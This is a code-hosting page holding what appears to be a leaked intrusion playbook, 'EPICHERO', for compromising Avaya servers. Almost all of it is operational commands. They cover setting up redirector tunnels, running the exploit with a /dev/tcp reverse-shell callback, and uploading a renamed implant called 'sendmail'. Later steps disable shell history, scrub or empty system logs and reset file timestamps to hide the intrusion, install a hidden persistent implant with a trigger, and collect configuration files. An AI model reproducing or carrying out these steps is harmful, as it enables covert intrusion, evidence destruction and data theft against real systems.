-
Notifications
You must be signed in to change notification settings - Fork 2.1k
/
Copy pathuser.tool.epichero.COMMON
352 lines (267 loc) · 8.86 KB
/
user.tool.epichero.COMMON
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
# 2010-08-16 22:35:31 EDT
############################ EPICHERO
mx
:%s/WINDOWS_OPS_STATION_IP/192.168.254.72/g
:%s/LINUX_OPS_STATION_IP/192.168.254.71/g
:%s/LOCAL_REDIRECTOR_IP/192.168.254.72/g
:%s/REMOTE_REDIRECTOR_IP/10.X.0.51/g
:%s/REVERSE_SHELL_CALLBACK_PORT/5060/g
:%s/NOPEN_LISTEN_PORT/5424/g
:%s/ISH_CALLBACK_PORT/5061/g
:%s/TARGET_IP/10.X.0.19/g
:%s/TRIGGER_BOX_IP/192.168.0.1/g
:%s#PATH_TO_EH_DIR#/current/down/epic/#g
:%s#WORKING_DIRECTORY#/root/.history/#g
:%s/NOPEN_NAME/sendmail/g
'x
#
# First, set up your tunnels, there are a specific list of ports you should use
# because of the default setup on the avaya servers, confirm these settings
# after you gain access
#
# PORTS TO USE (IN AND OUT) check with iptables -n -L after you get on target
#
# 5060 5061 1719 5424 21874
#
cat << "EOF" | unix2dos | nc -vvv -l -p 33333
monitor redirect -tcp -nodes 40 -lplisten RHP_CB_FOR_10.X.0.51 -target 127.0.0.1 1509
monitor packetredirect -packeeettype icmp -listenport 2222
monitor redirect -tcp -nodes 40 -lplisten 443 -target TARGET_IP 443
monitor redirect -tcp -nodes 40 -implantlisten REVERSE_SHELL_CALLBACK_PORT -target LINUX_OPS_STATION_IP REVERSE_SHELL_CALLBACK_PORT
monitor redirect -tcp -nodes 40 -lplisten NOPEN_LISTEN_PORT -target TARGET_IP NOPEN_LISTEN_PORT
EOF
#
# On the windows box, run "telnet LINUX_OPS_STATION_IP 33333" to get your pastables
#
#
# If you are throwing from a *Nix box (like when exploiting the second server)
#
-tunnel
l 443 TARGET_IP 443
r REVERSE_SHELL_CALLBACK_PORT
l NOPEN_LISTEN_PORT TARGET_IP NOPEN_LISTEN_PORT
s
#
# cd into the EPICHERO directory, check usage and run a survey command
#
cd PATH_TO_EH_DIR
./eh
./eh -v -i LOCAL_REDIRECTOR_IP
ls -lart
cat log
#
# you are looking for the scan and patch number to confirm the system is
# vulnerable, check with the developer, but you are safe if the version is 3.0.0
# SCAN: version=S8710-013-00.0.340.3
# ^ ^ ^
# | | Dot release
# | Minor Version number
# Major Version Number
#
#
# If everything looks good, set up your reverse shell command, and make sure it
# copied over correctly.
#
cd PATH_TO_EH_DIR
cat << EOF > reverse.shell.script
sh >/dev/tcp/REMOTE_REDIRECTOR_IP/REVERSE_SHELL_CALLBACK_PORT <&1 2>&1
EOF
ls -lart ; cat reverse.shell.script
cp /current/up/noserver-linux NOPEN_NAME
gzip NOPEN_NAME
uuencode NOPEN_NAME.gz NOPEN_NAME.gz > NOPEN_NAME.gz.uu
gedit NOPEN_NAME.gz.uu &
#
# Ok, confirm your tunnels are good to go and throw the exploit. /tmp is
# usually not executable, so you must find another working directory
#
nc -vvv -l -p REVERSE_SHELL_CALLBACK_PORT
./eh -e -r -s reverse.shell.script -i LOCAL_REDIRECTOR_IP
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
date; date -u
mount
ls -lart /root
ls -al /root/.history
ls -alc /root/.history
ls -lau /root/.history
cd /root/.history
pwd
type uudecode gunzip
uudecode; ls -lart
gunzip NOPEN_NAME.gz
chmod 700 NOPEN_NAME
PATH=. D=-lNOPEN_LISTEN_PORT NOPEN_NAME
#
# Now that you have nopen up (hopefully), check tripwire
#
-vget /etc/tripwire/twenable.txt
#
# Save these off, peruse them later after cleanup
#
iptables -L -n -v > T:/current/down/iptables-Lnv.TARGET_IP
#
# Go through your normal cleaning process, check logs, process accounting, etc.
# You will need to clean (at least)
#
#
# /var/log/httpd/error_log
# /var/log/ecs/commandhistory
# /var/log/ecs/update.log
# /var/log/secure
# /var/log/messages
# /var/iglut/upg_status.dat
# /tftpboot
-logs /var/iglut /tftpboot /var/log/httpd/ /var/log/ecs/
#
# Error logs are messy, it catches the nitty gritty details of our exploit, be
# sure to scrub the hell out of it. The best thing to do is probaby use look
# for obvious logs from us and use that timestamp (down to a minute or two) to
# remove everything
#
-ls /var/log/httpd/error_log
-tail -100 /var/log/httpd/error_log
egrep "YOUR_TIMESTAMP" /var/log/httpd/error_log
-gs grepout -w /root/.history "YOUR_TIMESTAMP" /var/log/httpd/error_log
touch -t GOOD_TIME_STAMP /var/log/httpd/error_log
#
# The best thing to grep for in the next two is probably the same timestamp
# above timestamp of when you exploited
#
-ls /var/log/ecs/commandhistory
-get /var/log/ecs/commandhistory
-tail -50 /var/log/ecs/commandhistory
egrep "YOUR STUFF" /var/log/ecs/commandhistory
-gs grepout -w /root/.history "YOUR STUFF" /var/log/ecs/commandhistory
touch -t GOOD_TIME_STAMP /var/log/ecs/commandhistory
#
#
#
-ls /var/log/ecs/update.log
-tail -50 /var/log/ecs/update.log
egrep "YOUR STUFF" /var/log/ecs/update.log
-gs grepout -w /root/.history "YOUR STUFF" /var/log/ecs/update.log
touch -t GOOD_TIME_STAMP /var/log/ecs/update.log
#
# The best thing to grep for in the secure log is a combination of your
# timestamp and sudo
#
-ls /var/log/secure
-tail -50 /var/log/secure
egrep "^YOUR_TIMESTAMP.*sudo" /var/log/secure
-gs grepout -w /root/.history "^YOUR_TIMESTAMP.*sudo" /var/log/secure
#
# Probably won't need to touch back times
#
#
# The best thing to grep for in /var/log/messages is a combination of your
# timestamp and update_show
#
-ls /var/log/messages
-tail -50 /var/log/messages
egrep "^YOUR_TIMESTAMP.*update_show" /var/log/messages
-gs grepout -w /root/.history "^YOUR_TIMESTAMP.*update_show" /var/log/messages
#
# Probably no need to touch back times
#
#
# It is possible, we are the only thing in /var/log/httpd/ssl_requests.log,
# if so, clear the file. Otherwise grep out our stuff. the timestamp format
# is different, but you can still use the same time
#
-ls /var/log/httpd/ssl_requests.log
-tail -50 /var/log/httpd/ssl_requests.log
egrep "YOUR_TIMESTAMP_DIFFERENT_FORMAT" /var/log/httpd/ssl_requests.log
-gs grepout -w /root/.history "YOUR_TIMESTAMP_DIFFERENT_FORMAT" /var/log/httpd/ssl_requests.log
# OR
cat /dev/null > /var/log/httpd/ssl_requests.log
#
# use your judgement to touch this file back to a good time
#
#
# According to devs, we are looking for status=66 in this file, if we are the only thing here, remove the file
#
-ls /var/iglut/upg_status.dat
-vget /var/iglut/upg_status.dat
egrep "status=66|Upgrade failed. Unable to transfer the license file to the target unit being upgraded." /var/iglut/upg_status.dat
egrep -v "status=66|Upgrade failed. Unable to transfer the license file to the target unit being upgraded." /var/iglut/upg_status.dat
-gs grepout -w /root/.history "status=66|Upgrade failed. Unable to transfer the license file to the target unit being upgraded." /var/iglut/upg_status.dat
# OR
-rm /var/iglut/upg_status.dat
#
# And probably touch this directory back to the time of the parent directory
#
-touch /var/iglut/.. /var/iglut/.
#
# The exploit does save some times for you that you can touch back, these are
# noted in the log file, on your linux ops box, enter
#
cat PATH_TO_EH_DIRlog
egrep TIMES PATH_TO_EH_DIRlog
mc
:%s#FILE_HOLDING_OPT_TIMES#OPT_TIMES#g
:%s#FILE_HOLDING_TFTPBOOT_TIMES#TFTPBOOT_TIMES#g
:%s#FILE_HOLDING_OPT_WS_TIMES#OPT_WS_TIMES#g
'c
#
# go ahead and use the timestamps it save for you to touch some directories back.
#
touch -r FILE_HOLDING_OPT_WS_TIMES `ls -l /opt/ws | cut -d '>' -f2`
touch -r FILE_HOLDING_OPT_TIMES /opt
touch -r FILE_HOLDING_TFTPBOOT_TIMES /tftpboot
#
# If you are good to implant, know that SAFFRONYELLOW combined with DEWDROP
# causes causes date to never return. The install will (should probably) be
# successful, but you WILL LOOSE the window you installed from!!!!
# Be prepared.
#
#
# Once you implant, you will probably need a trigger like this:
#
mx
:%s#HIDDEN_DIR#/lib/.b625a59f5f2a26de#g
`x
#
# Be sure you have your tunnels set up for the trigger if you are triggering
# through Windows
#
cat << "EOF" | unix2dos | nc -l -p 5555
monitor redirect -tcp -nodes 40 -target LINUX_OPS_STATION_IP ISH_CALLBACK_PORT -implantlisten ISH_CALLBACK_PORT
monitor redirect -tcp -nodes 40 -target TARGET_IP REVERSE_SHELL_CALLBACK_PORT -lplisten REVERSE_SHELL_CALLBACK_PORT
monitor packetredirect -packettype udp -listenport 2222 -bind WINDOWS_OPS_STATION_IP
EOF
#
# Once again, on windows "telnet LINUX_OPS_STATION_IP 5555"
#
ourtn -eY5U /current/up/noserver-linux -O REVERSE_SHELL_CALLBACK_PORT -p ISH_CALLBACK_PORT -i TRIGGER_BOX_IP -W WINDOWS_OPS_STATION_IP:2222 -w HIDDEN_DIR TARGET_IP
#
# And if you are attacking from a *Nix box
#
-irtun TARGET_IP ISH_CALLBACK_PORT -eY5U /current/up/noserver-linux -O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR
#
# now there is some collection the developers need
#
-get /var/log/secure*
-get /var/log/messages*
-get /var/log/httpd/access_log*
-get /var/log/httpd/ssl_request*
-get /var/log/ecs/commandhistory.*
-get /var/log/httpd/error_log*
#
# Get the last 2 or 3 of these
#
ls -lart /var/log/ecs/ | tail -5
#
# Get this file too
#
-lsh egrep "wlog$" /current/*timem
-get /etc/opt/defty/xln1
du -sh /etc/opt/ecs
-get /etc/opt/ecs
-get /etc/sysconfig/network-scripts
-get /opt/ecssw*/tripwire.conf
#
# Now, if after all this you have time, go exploit the second guy!
#